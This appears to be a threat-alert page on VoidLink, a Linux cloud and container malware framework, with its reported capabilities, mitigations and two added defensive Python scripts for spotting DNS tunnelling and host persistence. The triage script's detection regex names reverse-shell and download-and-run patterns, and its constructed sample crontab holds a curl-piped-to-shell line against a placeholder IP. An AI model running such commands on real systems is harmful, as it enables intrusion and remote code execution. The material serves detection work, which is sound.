

New Advanced Linux VoidLink Malware Targets Cloud and Container Environments
Published:
13 January 2026 at 11:57:00
Alert date:
13 January 2026 at 13:00:57
Source:
thehackernews.com
Operating Systems, Cloud & Virtualization, Ransomware & Malware
Check Point Research has documented VoidLink, a previously undocumented malware framework built specifically to target Linux-based cloud and container environments. It is engineered for long-term, stealthy access to and persistence in cloud infrastructure, and is described as a feature-rich, cloud-native framework comprising custom loaders, implants, rootkits, and modular components. Its cloud-aware design and rootkit tooling make it a serious threat to containerized workloads in particular.
Technical details
VoidLink is a feature-rich Linux malware framework written in the Zig programming language and designed for long-term, stealthy access to cloud environments. Its components and capabilities, as reported by Check Point Research:
Custom loaders, implants, and rootkits, plus 37+ modular plugins built around a custom Plugin API inspired by Cobalt Strike's Beacon Object Files (BOF).
Detection of major cloud environments (AWS, Google Cloud, Azure, Alibaba Cloud, Tencent Cloud), with behaviour adapted for Docker containers and Kubernetes pods.
Rootkit capabilities implemented three ways: LD_PRELOAD user-space hooking, loadable kernel modules (LKM), and eBPF.
Multiple C2 channels (HTTP/HTTPS, WebSocket, ICMP, and DNS tunneling) plus peer-to-peer mesh networking.
Anti-analysis measures: debugger detection, self-deletion on tampering, and self-modifying code with runtime encryption/decryption.
A risk score computed from the security products installed on the host, with evasion strategies adjusted accordingly.
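Of the C2 channels listed above, DNS tunneling is the one most often missed by perimeter controls, because the resolver does the outbound talking. The script below is an added example for this alert, not code from Check Point Research or from VoidLink, showing the heuristic a detection engineer would run over resolver logs: group queries by client and zone, then flag groups with many distinct, high-entropy subdomain prefixes or a high share of record types that tunnels favour. The log line format (dnsmasq-style), the thresholds, and the sample lines are all assumptions; the sample is constructed, not captured traffic.

```python
"""Heuristic triage of a DNS query log for tunnelling-style C2 beacons.

Added example for this alert; it is not code from Check Point Research or
from VoidLink. The log format, thresholds and sample lines are assumptions.
"""
import math
import re
from collections import defaultdict

# Assumed line shape (dnsmasq-like): "<time> query[<type>] <qname> from <client>"
LOG_RE = re.compile(r"^\S+ query\[(?P<qtype>[A-Z]+)\] (?P<qname>\S+) from (?P<client>\S+)$")

# Constructed sample, not captured traffic. Client 10.0.1.7 emits many unique,
# high-entropy TXT lookups under one zone, the pattern a DNS tunnel leaves behind.
SAMPLE_LOG = """\
12:00:01 query[A] www.example.com from 10.0.1.5
12:00:02 query[A] cdn.example.com from 10.0.1.5
12:00:03 query[A] api.example.com from 10.0.1.5
12:00:04 query[A] mail.example.com from 10.0.1.5
12:00:05 query[TXT] 3f9a1c7e2b8d4f6a0e5c.t.example.net from 10.0.1.7
12:00:06 query[TXT] 8e2d6b0a4c9f1e7d3b5a.t.example.net from 10.0.1.7
12:00:07 query[TXT] 1c5e9a3d7f2b6e0a4c8d.t.example.net from 10.0.1.7
12:00:08 query[TXT] 7b3f0d5a9c1e4b8f2a6c.t.example.net from 10.0.1.7
12:00:09 query[TXT] 0a4c8e2b6d1f5a9c3e7b.t.example.net from 10.0.1.7
12:00:10 query[A] www.example.com from 10.0.1.7
"""


def parse_line(line):
    """Return (client, qtype, qname) or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), m.group("qtype"), m.group("qname").lower().rstrip(".")


def shannon_entropy(s):
    """Bits per character: ~4.0 for random hex, roughly 0-2 for ordinary hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname):
    """Crude zone cut: last two labels (a real deployment would use a public-suffix list)."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def score_log(lines, min_unique=4, entropy_threshold=3.0,
              carrier_types=("TXT", "NULL", "CNAME", "MX")):
    """Group queries by (client, zone) and flag groups that look like a tunnel.

    A group is flagged when it has at least min_unique distinct subdomain
    prefixes AND either the prefixes are high-entropy or at least half of the
    queries use record types tunnels favour for carrying data."""
    groups = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qtype, qname = parsed
        groups[(client, base_domain(qname))].append((qtype, qname))

    findings = []
    for (client, zone), queries in sorted(groups.items()):
        prefixes = {qn[: -(len(zone) + 1)] for _, qn in queries if qn.endswith("." + zone)}
        prefixes.discard("")
        if len(prefixes) < min_unique:
            continue
        mean_entropy = sum(shannon_entropy(p.replace(".", "")) for p in prefixes) / len(prefixes)
        carrier_share = sum(1 for qt, _ in queries if qt in carrier_types) / len(queries)
        if mean_entropy >= entropy_threshold or carrier_share >= 0.5:
            findings.append({
                "client": client,
                "zone": zone,
                "unique_prefixes": len(prefixes),
                "mean_prefix_entropy": round(mean_entropy, 2),
                "carrier_share": round(carrier_share, 2),
            })
    return findings


if __name__ == "__main__":
    for finding in score_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

On the constructed sample only the 10.0.1.7 / example.net group is flagged; the four ordinary lookups from 10.0.1.5 clear the unique-prefix bar but have low entropy and no carrier record types. Tune min_unique and the entropy threshold against a baseline of your own resolver logs before alerting on them, since CDNs and some telemetry SDKs also generate many unique subdomains.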
Mitigation steps:
Monitor for LD_PRELOAD abuse (entries in /etc/ld.so.preload, LD_PRELOAD set in process environments), unexpected loadable kernel module activity, and eBPF programs used for process hiding.
Extend monitoring to cloud control planes and container ecosystems (Docker hosts, Kubernetes pods), not just traditional hosts.
Watch for unusual C2 traffic over HTTP/HTTPS, WebSocket, ICMP, and DNS tunneling, including ICMP or DNS volumes that do not match a workload's normal profile.
Monitor for credential harvesting targeting SSH keys, git credentials, browser data, tokens, and API keys.
Be alert for lateral movement via SSH-based worm activity, and for unauthorized persistence through dynamic linker abuse, cron jobs, and system services.
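The first and last mitigation steps above, and the rootkit techniques listed under Technical details, come down to a small set of host artefacts. The script below is an added example for this alert, not code from Check Point Research or from VoidLink, that triages three of them: /etc/ld.so.preload and per-process LD_PRELOAD, loadable kernel modules present in /sys/module but absent from /proc/modules (a module that unlinks itself from the kernel's module list to hide from lsmod generally still leaves its sysfs directory behind), and cron entries with download-and-run or temp-directory payload patterns. The check functions take file contents as arguments so they can run against collected artefacts; the live collector reads the local host and needs root to see every process's environment. The suspicious-path list, the cron regex, and the sample inputs are assumptions and the samples are constructed, not taken from a real compromise.

```python
"""Host triage for the persistence and rootkit mechanisms listed in this alert:
LD_PRELOAD abuse, hidden loadable kernel modules, and cron-based persistence.

Added example; not code from Check Point Research or from VoidLink. Paths
treated as suspicious, the cron regex, and the sample inputs are assumptions."""
import os
import re

CRON_RE = re.compile(
    r"(curl|wget)[^|;]*\|\s*(ba)?sh"        # download piped straight into a shell
    r"|base64\s+(-d|--decode)"             # inline decoded payload
    r"|/dev/tcp/"                           # bash reverse shell idiom
    r"|(/tmp|/dev/shm|/var/tmp)/\S+"        # payload living in a scratch directory
)

# Constructed samples (not from a real compromise) used by the checks below.
SAMPLE_LD_SO_PRELOAD = "/usr/lib/x86_64-linux-gnu/libfoo.so\n/dev/shm/.x/libhide.so\n"
SAMPLE_ENVIRONS = {
    "1234": b"PATH=/usr/bin\0LD_PRELOAD=/dev/shm/.x/libhide.so\0HOME=/root\0",
    "1235": b"PATH=/usr/bin\0HOME=/home/app\0",
}
SAMPLE_PROC_MODULES = (
    "ext4 900000 1 - Live 0x0000000000000000\n"
    "nf_tables 300000 0 - Live 0x0000000000000000\n"
)
SAMPLE_SYS_MODULE_LOADABLE = ["ext4", "nf_tables", "example_hidden"]
SAMPLE_CRONTABS = {
    "/etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup.sh\n",
    "/var/spool/cron/crontabs/app": (
        "*/5 * * * * curl -s http://203.0.113.10/u | sh\n"
        "@reboot /tmp/.x/run\n"
    ),
}


def check_ld_preload(ld_so_preload_text, environs):
    """environs maps pid -> raw bytes of /proc/<pid>/environ. Returns finding strings."""
    findings = []
    for line in ld_so_preload_text.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        # Any entry deserves a look; one outside the system library dirs is a strong signal.
        severity = "review" if path.startswith(("/usr/lib", "/lib")) else "high"
        findings.append(f"ld.so.preload:{severity}:{path}")
    for pid, env in environs.items():
        for entry in env.split(b"\0"):
            if entry.startswith(b"LD_PRELOAD="):
                findings.append(f"env:pid={pid}:{entry.decode(errors='replace')}")
    return findings


def find_hidden_modules(proc_modules_text, sys_module_loadable):
    """Names in /sys/module (loadable ones, i.e. those with an initstate file)
    that are missing from /proc/modules, the list lsmod prints."""
    listed = {line.split()[0] for line in proc_modules_text.splitlines() if line.strip()}
    return sorted(set(sys_module_loadable) - listed)


def check_cron(crontabs):
    """crontabs maps a source path -> crontab text. Flags suspicious job lines."""
    findings = []
    for source, text in crontabs.items():
        for line in text.splitlines():
            job = line.strip()
            if not job or job.startswith("#"):
                continue
            if CRON_RE.search(job):
                findings.append(f"{source}:{job}")
    return findings


def collect_live():
    """Read the real artefacts from this host (Linux only; root needed for all environs)."""
    def read(path, mode="r"):
        try:
            with open(path, mode) as fh:
                return fh.read()
        except OSError:
            return "" if mode == "r" else b""

    environs = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        env = read(f"/proc/{pid}/environ", "rb")
        if env:
            environs[pid] = env
    loadable = []
    if os.path.isdir("/sys/module"):
        loadable = [m for m in os.listdir("/sys/module")
                    if os.path.exists(f"/sys/module/{m}/initstate")]
    crontabs = {"/etc/crontab": read("/etc/crontab")}
    for d in ("/etc/cron.d", "/var/spool/cron/crontabs", "/var/spool/cron"):
        if os.path.isdir(d):
            for name in os.listdir(d):
                crontabs[os.path.join(d, name)] = read(os.path.join(d, name))
    return {
        "ld_preload": check_ld_preload(read("/etc/ld.so.preload"), environs),
        "hidden_modules": find_hidden_modules(read("/proc/modules"), loadable),
        "cron": check_cron(crontabs),
    }


if __name__ == "__main__":
    for key, value in collect_live().items():
        print(key, value)
```

Run it as root on a suspect host, or feed it files pulled off a disk image. An eBPF-based rootkit leaves none of these three artefacts; for that case list loaded programs with bpftool prog show and compare against what your own tooling is expected to have attached, which is deliberately left out of this script because it has no offline-testable input.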
Affected products:
Linux-based cloud environments
Amazon Web Services (AWS)
Google Cloud
Microsoft Azure
Alibaba Cloud
Tencent Cloud
Docker containers
Kubernetes pods
Git version control systems
Related links:
https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/
https://ziglang.org
https://thehackernews.com/2023/03/cryptojacking-group-teamtnt-suspected.html
https://en.wikipedia.org/wiki/Loadable_kernel_module
https://thehackernews.com/2025/10/linkpro-linux-rootkit-uses-ebpf-to-hide.html
Related CVEs:
Related threat actors:
IOCs:
No file hashes or network indicators are listed on this page. Reported artifacts: the VoidLink malware framework and a Chinese web-based dashboard used for remote control.
This article was created with the assistance of AI technology by Perceptive.

